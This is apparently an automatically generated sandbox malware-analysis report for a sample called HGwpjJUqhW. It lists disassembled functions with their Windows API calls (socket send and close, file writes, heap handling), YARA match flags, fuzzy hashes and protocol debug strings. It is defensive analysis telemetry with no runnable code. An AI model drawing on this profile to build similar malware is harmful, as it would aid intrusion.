                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: b7c69bb79fb3bcb2fd6cfa0adfd59acc8dc2ffca5bbbf63e32c266a8326b1711
                                                                                                                            • Instruction ID: 9ac6f77b704230c679f74a444817248389ab225bac1c60233dc643751293658a
                                                                                                                            • Opcode Fuzzy Hash: b7c69bb79fb3bcb2fd6cfa0adfd59acc8dc2ffca5bbbf63e32c266a8326b1711
                                                                                                                            • Instruction Fuzzy Hash: D011B2767007148BD320EA7AED8496BF7ECFB88725B05092EFA05C3644DB71E800CBA5
                                                                                                                            Function 0362DD10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 0362DD32
                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 0362DE35
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: Main
                                                                                                                            • API String ID: 1452528299-521822810
                                                                                                                            • Opcode ID: bdf6d56655b0b0c6a41de590695fbe912af16a3bdc5bf9d0e87017fb90bec574
                                                                                                                            • Instruction ID: 221bdc11f4e1f772db4457f7725d9a50c011cbef301c09297f206862941fffaf
                                                                                                                            • Opcode Fuzzy Hash: bdf6d56655b0b0c6a41de590695fbe912af16a3bdc5bf9d0e87017fb90bec574
                                                                                                                            • Instruction Fuzzy Hash: 6241DE31A40A09DFD720DF58D880BAABBE8FF94314F1946A9E9558B351E770E941CB80
                                                                                                                            Function 02C33F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,74DEDFA0,02C33648), ref: 02C34054
                                                                                                                              • Part of subcall function 02C32B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C32B96
                                                                                                                              • Part of subcall function 02C32B80: SwitchToThread.KERNEL32 ref: 02C32BAA
                                                                                                                            • send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                            • closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254528666-0
                                                                                                                            • Opcode ID: 58c0465e13a44256ccb5bb9be519b59bf717dd5e8cdaf5713872c416cbecfa15
                                                                                                                            • Instruction ID: 622bc324a5e0e94a70c4302cd013dbed63d55f88e35316bd5aca2f92b65d108c
                                                                                                                            • Opcode Fuzzy Hash: 58c0465e13a44256ccb5bb9be519b59bf717dd5e8cdaf5713872c416cbecfa15
                                                                                                                            • Instruction Fuzzy Hash: 6D215A79740B009BD3359F69D888B5BB7F5BB84754F500E1CE68287A80C7BAF855CB90
                                                                                                                            Function 03623F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,74DEDFA0,03623648), ref: 03624054
                                                                                                                              • Part of subcall function 03622BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03622BD6
                                                                                                                              • Part of subcall function 03622BC0: SwitchToThread.KERNEL32 ref: 03622BEA
                                                                                                                            • send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03623FE9
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                            • closesocket.WS2_32(?), ref: 03624025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254528666-0
                                                                                                                            • Opcode ID: fd77f8a11fd7208a28a180f9dd4f6bd17109754ac274e1b53fbd5b097649e5f6
                                                                                                                            • Instruction ID: caf1957a57777f046f9fe2a666251dfe319b897744d73fe0a460e26bbf82bc2a
                                                                                                                            • Opcode Fuzzy Hash: fd77f8a11fd7208a28a180f9dd4f6bd17109754ac274e1b53fbd5b097649e5f6
                                                                                                                            • Instruction Fuzzy Hash: 95214778600B109BD331EB25D998B5BBBB5BB44B10F240D1CF2928A784CBB9E4418F50
                                                                                                                            Function 02C34060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34074
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34087
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34090
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34099
                                                                                                                              • Part of subcall function 02C31350: HeapFree.KERNEL32(?,00000000,?,?,?,02C340A6,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C31390
                                                                                                                              • Part of subcall function 02C31420: HeapFree.KERNEL32(?,00000000,?,?,?,02C340B1,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C3143D
                                                                                                                              • Part of subcall function 02C31420: _free.LIBCMT ref: 02C31459
                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C340B9
                                                                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C340D4
                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34150
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1219087420-0
                                                                                                                            • Opcode ID: 51b60e1e932ee41585f5a943a95cf3161c5998a7c433a097408044093724bfee
                                                                                                                            • Instruction ID: 5f065f698d064335d6de7904ac58710c820eb98d49ef68f8340f0decab38b62a
                                                                                                                            • Opcode Fuzzy Hash: 51b60e1e932ee41585f5a943a95cf3161c5998a7c433a097408044093724bfee
                                                                                                                            • Instruction Fuzzy Hash: 77314878600A02AFD709DF34C898B96F7E9FF48310F048A49E42987250CB35B851DFD0
                                                                                                                            Function 03624060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624074
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624087
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624090
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624099
                                                                                                                              • Part of subcall function 03621350: HeapFree.KERNEL32(?,00000000,?,?,?,036240A6,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03621390
                                                                                                                              • Part of subcall function 03621420: HeapFree.KERNEL32(?,00000000,?,?,?,036240B1,?,00000000,03624039,?,74DEDFA0,03623648), ref: 0362143D
                                                                                                                              • Part of subcall function 03621420: _free.LIBCMT ref: 03621459
                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 036240B9
                                                                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 036240D4
                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624150
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1219087420-0
                                                                                                                            • Opcode ID: c672deb36f96377d3f919c6a57549c83557609df33782c1c7f9de50b4bb2cc77
                                                                                                                            • Instruction ID: 7b97dee5b788d6a7b377758d789f065ea82943b5b585e1b781135a9f34d6eca1
                                                                                                                            • Opcode Fuzzy Hash: c672deb36f96377d3f919c6a57549c83557609df33782c1c7f9de50b4bb2cc77
                                                                                                                            • Instruction Fuzzy Hash: 8D316774600A16AFD705EF39C898BA6FBA8FF48310F158649E429CB254CB35B851CFE4
                                                                                                                            Function 034AB62F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_malloc
                                                                                                                            • String ID: ($6$gfff$gfff
                                                                                                                            • API String ID: 3506388080-713438465
                                                                                                                            • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                            • Instruction ID: 3f3923a27738a5a2c9b11c4c0e70f1d963a9cecd4a01442bfff3b7265205dac4
                                                                                                                            • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                            • Instruction Fuzzy Hash: 43D17AB1E00318AFDB10DFE9DC85A9EBBB9FF58300F10412AE505AB351D774A945CBA5
                                                                                                                            Function 02C32140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C31610: __vswprintf.LIBCMT ref: 02C31646
                                                                                                                            • _malloc.LIBCMT ref: 02C32330
                                                                                                                              • Part of subcall function 02C36E83: __FF_MSGBANNER.LIBCMT ref: 02C36E9C
                                                                                                                              • Part of subcall function 02C36E83: __NMSG_WRITE.LIBCMT ref: 02C36EA3
                                                                                                                              • Part of subcall function 02C36E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36EC8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                            • API String ID: 3723585974-868042568
                                                                                                                            • Opcode ID: 53678037abea2022876a534e7f61a10d512481a1b1de2f917b089e7fff3fc8e2
                                                                                                                            • Instruction ID: 9fe3b48926f82b78721ecd42d67af8be3173be2bedf0920c7e9e2b4f0044394b
                                                                                                                            • Opcode Fuzzy Hash: 53678037abea2022876a534e7f61a10d512481a1b1de2f917b089e7fff3fc8e2
                                                                                                                            • Instruction Fuzzy Hash: F8B1B075A002058FCF19CF69C8806AA7BB6FF84324F084AAADD499B346D771DE41CB91
                                                                                                                            Function 03622140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03621610: __vswprintf.LIBCMT ref: 03621646
                                                                                                                            • _malloc.LIBCMT ref: 03622330
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                            • API String ID: 3723585974-868042568
                                                                                                                            • Opcode ID: b20c604044eb79a4d5f01cd75c9ba6b2bdb3cb4887de74617ec869fba7f3d3c5
                                                                                                                            • Instruction ID: 2b63459a44532d55dc933ee4ee6dfdd0599a05b9d1f7d7b18eb6b2e2d526f398
                                                                                                                            • Opcode Fuzzy Hash: b20c604044eb79a4d5f01cd75c9ba6b2bdb3cb4887de74617ec869fba7f3d3c5
                                                                                                                            • Instruction Fuzzy Hash: 4DB1D275A006258BCF58CF68C990AAEBFA5BF44310F0A4AAEDD099F346D731D941CF94
                                                                                                                            Function 02C31830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 02C31878
                                                                                                                            • _free.LIBCMT ref: 02C318B6
                                                                                                                            • _free.LIBCMT ref: 02C318F5
                                                                                                                            • _free.LIBCMT ref: 02C31935
                                                                                                                            • _free.LIBCMT ref: 02C3195D
                                                                                                                            • _free.LIBCMT ref: 02C31981
                                                                                                                            • _free.LIBCMT ref: 02C319B9
                                                                                                                              • Part of subcall function 02C36E49: HeapFree.KERNEL32(00000000,00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36E5F
                                                                                                                              • Part of subcall function 02C36E49: GetLastError.KERNEL32(00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000), ref: 02C36E71
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: e3b02be6081c05cfb457471ad602fb5b2627e0cc820f6b8fd5b008cbc4c52c08
                                                                                                                            • Instruction ID: eebb670f293a41f4fa1fa3999891b818a555e8b8851a86c9ff7145fa47cd1ab5
                                                                                                                            • Opcode Fuzzy Hash: e3b02be6081c05cfb457471ad602fb5b2627e0cc820f6b8fd5b008cbc4c52c08
                                                                                                                            • Instruction Fuzzy Hash: 22514BB6A00210DFD715DF59C4C0959BBE6BF8931872A89ADC50EAB311C772EE42CF91
                                                                                                                            Function 03621830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 03621878
                                                                                                                            • _free.LIBCMT ref: 036218B6
                                                                                                                            • _free.LIBCMT ref: 036218F5
                                                                                                                            • _free.LIBCMT ref: 03621935
                                                                                                                            • _free.LIBCMT ref: 0362195D
                                                                                                                            • _free.LIBCMT ref: 03621981
                                                                                                                            • _free.LIBCMT ref: 036219B9
                                                                                                                              • Part of subcall function 0362F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F64F
                                                                                                                              • Part of subcall function 0362F639: GetLastError.KERNEL32(00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000), ref: 0362F661
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: be51927fdcbd63b59e3605b04c8cd64db592a445eae76d9e3befbf2417615b6c
                                                                                                                            • Instruction ID: de240844ad220fba94c0c8936432be16d2ec0691850ce162542ca5f185450191
                                                                                                                            • Opcode Fuzzy Hash: be51927fdcbd63b59e3605b04c8cd64db592a445eae76d9e3befbf2417615b6c
                                                                                                                            • Instruction Fuzzy Hash: AD513B76A046258FC714DF59C2D49A5BFB6FF8A21471A80BDC90A9F321C732AD42CF91
                                                                                                                            Function 02C33870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C33883
                                                                                                                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02C338C4
                                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02C33931
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C3395C
                                                                                                                            • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02C339F4
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02C33A22
                                                                                                                            • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02C33A39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058130114-0
                                                                                                                            • Opcode ID: 4f1ac9c562548193fed5b56a0032a794eb2aba8c0096f93a7786cfb9a8a3581b
                                                                                                                            • Instruction ID: 23a397ac4bac72cac3240b740258881c2d5c12cd1d63e369ff528063b5ea4f2f
                                                                                                                            • Opcode Fuzzy Hash: 4f1ac9c562548193fed5b56a0032a794eb2aba8c0096f93a7786cfb9a8a3581b
                                                                                                                            • Instruction Fuzzy Hash: 86519A70A00740DBDB22DF65C984BAAB7E5BF84714F504E59E95ADB280EB30EA40CFD1
                                                                                                                            Function 03623870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03623883
                                                                                                                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 036238C4
                                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03623931
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362395C
                                                                                                                            • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 036239F4
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03623A22
                                                                                                                            • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03623A39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058130114-0
                                                                                                                            • Opcode ID: 27fe95bcaef879213944bc0a348c6db048dc8a6033ecbaf641068baf0a11a49b
                                                                                                                            • Instruction ID: 3a168c9f22f7217f337e4c5e3e0ed52d6b8abd55fcb3d1f5c17970d6c40fca20
                                                                                                                            • Opcode Fuzzy Hash: 27fe95bcaef879213944bc0a348c6db048dc8a6033ecbaf641068baf0a11a49b
                                                                                                                            • Instruction Fuzzy Hash: AD51C378A00F109BD720DF25CA8079ABFE8BF02714F26091DE9569B384EB79E440CF45
                                                                                                                            Function 0362E6B0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6BD
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6D7
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362E6F2
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000), ref: 0362E6FF
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 0362E70A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362E711
                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0362E71E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4202892810-0
                                                                                                                            • Opcode ID: f52e7c51d72bd41e7d8c7e5a858f930e644ce68b0bceeeca1dcdbe6b17d25b5d
                                                                                                                            • Instruction ID: f0992ea138ffaf02e478661d5c7c5f9215af986d7b596061f04404921628058c
                                                                                                                            • Opcode Fuzzy Hash: f52e7c51d72bd41e7d8c7e5a858f930e644ce68b0bceeeca1dcdbe6b17d25b5d
